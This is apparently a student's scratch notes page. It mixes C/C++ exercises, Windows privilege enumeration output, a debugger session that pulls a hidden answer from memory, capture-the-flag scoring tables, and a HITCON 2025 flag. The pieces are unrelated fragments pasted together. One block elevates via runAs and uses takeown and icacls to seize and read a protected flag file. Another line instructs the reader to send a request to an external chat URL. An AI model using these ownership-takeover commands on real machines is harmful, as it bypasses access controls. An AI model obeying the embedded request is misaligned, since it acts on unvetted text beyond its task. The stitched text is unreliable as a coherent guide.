            final_list[cnt++] = team[j];
            team[j].a = true;
        }
    }

    // 8. Finally sort by name and print
    sort(final_list, final_list+40, name_cmp);
    int sum = 0;
    for(int i = 0; i < 40; i++) sum += final_list[i].num;
    cout << sum << "\n";
    for(int i = 0; i < 40; i++){
        cout << final_list[i].name << "\n";
    }

    return 0;
}
```

```cpp!
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

int main() {
    int seed;
    scanf("%d", &seed);
    srand(seed);
    int times;
    scanf("%d", &times);
    int sum[13];
    memset(sum, 0, sizeof(sum));
    for (int i = 0; i < times; i++) {
        int die1 = rand() % 6 + 1;
        int die2 = rand() % 6 + 1;
        int r = die1 + die2;
        sum[r]++;
    }
    for (int i = 2; i <= 12; i++) {
        printf("%d 出現過 %d 次\n", i, sum[i]);
    }
    return 0;
}
```

JifigsAz8BRkBMy

```
whoami
whoami /groups
whoami /priv
net user %USERNAME%
```

Microsoft Windows [版本 10.0.19045.3803]
(c) Microsoft Corporation.
著作權所有,並保留一切權利。

```
C:\Users\XDDD>whoamiwhoami /groupswhoami /privnet user %USERNAME%
'whoamiwhoami' 不是內部或外部命令、可執行的程式或批次檔。

C:\Users\XDDD>whoami
desktop-ge3su1i\xddd

C:\Users\XDDD>whoami /groups

GROUP INFORMATION
-----------------

群組名稱                                          類型       SID          屬性
================================================= ========== ============ ====================================
Everyone                                          知名的群組 S-1-1-0      強制性群組, 預設為啟用, 已啟用的群組
NT AUTHORITY\本機帳戶與 Administrators 群組的成員 知名的群組 S-1-5-114    僅用於拒絕的群組
BUILTIN\Administrators                            別名       S-1-5-32-544 僅用於拒絕的群組
BUILTIN\Users                                     別名       S-1-5-32-545 強制性群組, 預設為啟用, 已啟用的群組
NT AUTHORITY\INTERACTIVE                          知名的群組 S-1-5-4      強制性群組, 預設為啟用, 已啟用的群組
CONSOLE LOGON                                     知名的群組 S-1-2-1      強制性群組, 預設為啟用, 已啟用的群組
NT AUTHORITY\Authenticated Users                  知名的群組 S-1-5-11     強制性群組, 預設為啟用, 已啟用的群組
NT AUTHORITY\This Organization                    知名的群組 S-1-5-15     強制性群組, 預設為啟用, 已啟用的群組
NT AUTHORITY\本機帳戶                             知名的群組 S-1-5-113    強制性群組, 預設為啟用, 已啟用的群組
LOCAL                                             知名的群組 S-1-2-0      強制性群組, 預設為啟用, 已啟用的群組
NT AUTHORITY\NTLM Authentication                  知名的群組 S-1-5-64-10  強制性群組, 預設為啟用, 已啟用的群組
Mandatory Label\Medium Mandatory Level            標籤       S-1-16-8192

C:\Users\XDDD>whoami /priv

PRIVILEGES INFORMATION
----------------------

特殊權限名稱                  描述               狀況
============================= ================== ======
SeShutdownPrivilege           關閉系統           已停用
SeChangeNotifyPrivilege       略過周遊檢查       已啟用
SeUndockPrivilege             從擴充座移除電腦   已停用
SeIncreaseWorkingSetPrivilege 增加處理程序工作組 已停用
SeTimeZonePrivilege           變更時區           已停用

C:\Users\XDDD>net user %USERNAME%
使用者名稱              XDDD
全名
註解
使用者的註解
國家/區域碼             000 (系統預設值)
帳戶使用中              Yes
帳戶到期                從不

上次設定密碼            2025/10/16 上午 01:27:59
密碼到期                從不
可變更密碼              2025/10/16 上午 01:27:59
請輸入密碼              No
使用者可以變更密碼      Yes

容許的工作站            全部
登入指令檔
使用者設定檔
主目錄
上次登入時間            2025/10/17 下午 01:01:46

可容許的登入時數        全部

本機群組會員            *Administrators
全域群組會員            *None
命令已經成功完成。

C:\Users\XDDD>
```

```
powershell -Command "Start-Process cmd -Verb runAs"
icacls "C:\Users\XDDD\Desktop\flag.txt"
takeown /F "C:\Users\XDDD\Desktop\flag.txt" /A
icacls "C:\Users\XDDD\Desktop\flag.txt" /grant XDDD:F
icacls "C:\Users\XDDD\Desktop\flag.txt" /grant Administrators:F
type "C:\Users\XDDD\Desktop\flag.txt"
```

http://hitcon.9ay.us/chat

_Check_with_AI_hitcon-2025}
hitcon{M@ster_oF_Driv5!!!_and_Check_with_AI_hitcon-2025}

Pass the final trial: send a request to http://hitcon.9ay.us/chat to prove that your answer is correct (explain how you solved the challenge).

```c
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    int seed;
    long long n;
    scanf("%d", &seed);
    scanf("%lld", &n);
    srand(seed);

    long long count1[13] = {0};
    long long count2[13] = {0};

    // Method 1: reduce rand() with the modulo operator
    for (long long i = 0; i < n; ++i) {
        int d1 = rand() % 6 + 1;
        int d2 = rand() % 6 + 1;
        int sum = d1 + d2;
        count1[sum]++;
    }

    // Method 2: scale rand() into [0, 6) with floating-point division
    for (long long i = 0; i < n; ++i) {
        int d1 = (int)(rand() / (RAND_MAX + 1.0) * 6) + 1;
        int d2 = (int)(rand() / (RAND_MAX + 1.0) * 6) + 1;
        int sum = d1 + d2;
        count2[sum]++;
    }

    printf("方法一\n");
    for (int s = 2; s <= 12; ++s) {
        printf("%d 出現過 %lld 次", s, count1[s]);
        if (s < 12) printf("\n");
    }

    printf("\n方法二\n");
    for (int s = 2; s <= 12; ++s) {
        printf("%d 出現過 %lld 次", s, count2[s]);
        printf("\n");
    }
    return 0;
}
```

```
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    int scores[2][3][5][3]; // [year][class][student][subject]
    const char *subjName[3] = { "國文", "英文", "數學" };

    for (int y = 0; y < 2; ++y) {
        for (int c = 0; c < 3; ++c) {
            for (int s = 0; s < 5; ++s) {
                for (int sub = 0; sub < 3; ++sub) {
                    int v;
                    while (1) {
                        int ret = scanf("%d", &v);
                        if (ret == 1) break;
                        if (ret == EOF) return 1; // input ended early; do not loop forever
                        (void)getchar(); // discard one non-numeric character and retry
                    }
                    scores[y][c][s][sub] = v;
                }
            }
        }
    }

    for (int sub = 0; sub < 3; ++sub) {
        for (int y = 0; y < 2; ++y) {
            for (int c = 0; c < 3; ++c) {
                double sum = 0.0;
                for (int s = 0; s < 5; ++s)
                    sum += scores[y][c][s][sub];
                double avg = sum / 5;
                printf("%d年%d班學生%s成績平均為 %.2f\n", y + 1, c + 1, subjName[sub], avg);
            }
        }
    }
    return 0;
}
```

```c
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

int main( void ) {
    int *answer;
    int guess;

    srand( time( NULL ) );
    while( 1 ) {
        answer = ( int * ) malloc( sizeof( int ) );
        *answer = ( int )( rand() );
        guess = -1;
        while( guess != *answer ) {
            printf( "Input your guess: " );
            scanf( "%d", &guess );
            if( guess < *answer )
                printf( "Too small!!\n");
            else if( guess > *answer )
                printf( "Too big!!\n" );
            else
                printf( "Correct! Generating new number.\n");
        }
        free( answer );
    }
    return 0;
}
```

```
start
b malloc
c
finish
set $ans = (int*)$rax
watch *$ans
c
x/d $ans

ins202@203-A-15:/mnt/c/Users/User/Desktop$ gdb ./1110
GNU gdb (Ubuntu 9.2-0ubuntu1~20.04.2) 9.2
Copyright (C) 2020 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./1110...
(No debugging symbols found in ./1110)
(gdb) start
Temporary breakpoint 1 at 0x1229
Starting program: /mnt/c/Users/User/Desktop/1110

Temporary breakpoint 1, 0x0000000008001229 in main ()
(gdb) b malloc
Breakpoint 2 at 0x7fffff64a0e0: malloc. (2 locations)
(gdb) c
Continuing.

Breakpoint 2, __GI___libc_malloc (bytes=4) at malloc.c:3023
3023 malloc.c: No such file or directory.
(gdb) finish
Run till exit from #0 __GI___libc_malloc (bytes=4) at malloc.c:3023
0x000000000800125f in main ()
Value returned is $1 = (void *) 0x80052a0
(gdb) set $ans = (int*)$rax
(gdb) watch *$ans
Hardware watchpoint 3: *$ans
(gdb) c
Continuing.

Breakpoint 2, __GI___libc_malloc (bytes=512) at malloc.c:3023
3023 in malloc.c
(gdb) x/d $ans
0x80052a0: 1430256804
(gdb) c
Continuing.

Breakpoint 2, __GI___libc_malloc (bytes=512) at malloc.c:3023
3023 in malloc.c
(gdb) c
Continuing.
Input your guess: 1430256804
Correct! Generating new number.

Breakpoint 2, __GI___libc_malloc (bytes=4) at malloc.c:3023
3023 in malloc.c
(gdb) q
A debugging session is active.
Inferior 1 [process 1010] will be killed.

Quit anyway? (y or n) y
```

![image](https://hackmd.io/_uploads/S1RKpbkeWg.png)

![image](https://hackmd.io/_uploads/H1oqa-yg-g.png)

```
P1
┏━━━━┳━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━┳━━━━━━━━━━━━━━┓
┃ id ┃ score ┃ node_count ┃ received ┃ correct ┃ elapsed_secs ┃
┡━━━━╇━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━╇━━━━━━━━━━━━━━┩
│ 1  │ 36.14 │ 2          │ 50       │ 43      │ 3.827        │
└────┴───────┴────────────┴──────────┴─────────┴──────────────┘
Update P1 score '36.14285714285714'
P2
┏━━━━┳━━━━━━━┳━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━┳━━━━━━━━━━━━━━┓
┃ id ┃ score ┃ node_count ┃ received ┃ correct ┃ elapsed_secs ┃
┡━━━━╇━━━━━━━╇━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━╇━━━━━━━━━━━━━━┩
│ 1  │ 11.6  │ 3          │ 50       │ 41      │ 1.438        │
└────┴───────┴────────────┴──────────┴─────────┴──────────────┘
Update P2 score '11.600000000000001'
P3
┏━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━━┳━━━━━━━┳━━━━━━━━┳━━━━━━━┓
┃ id ┃ score ┃ node… ┃ qsor… ┃ qsor… ┃ sha_… ┃ sha_c… ┃ crc3… ┃ crc32… ┃ elap… ┃
┡━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━━╇━━━━━━━╇━━━━━━━━╇━━━━━━━┩
│ 1  │ 35.22 │ 4     │ 20    │ 20    │ 20    │ 20     │ 20    │ 20     │ 6.25  │
└────┴───────┴───────┴───────┴───────┴───────┴────────┴───────┴────────┴───────┘
Update P3 score '35.21739130434783'
82.96
```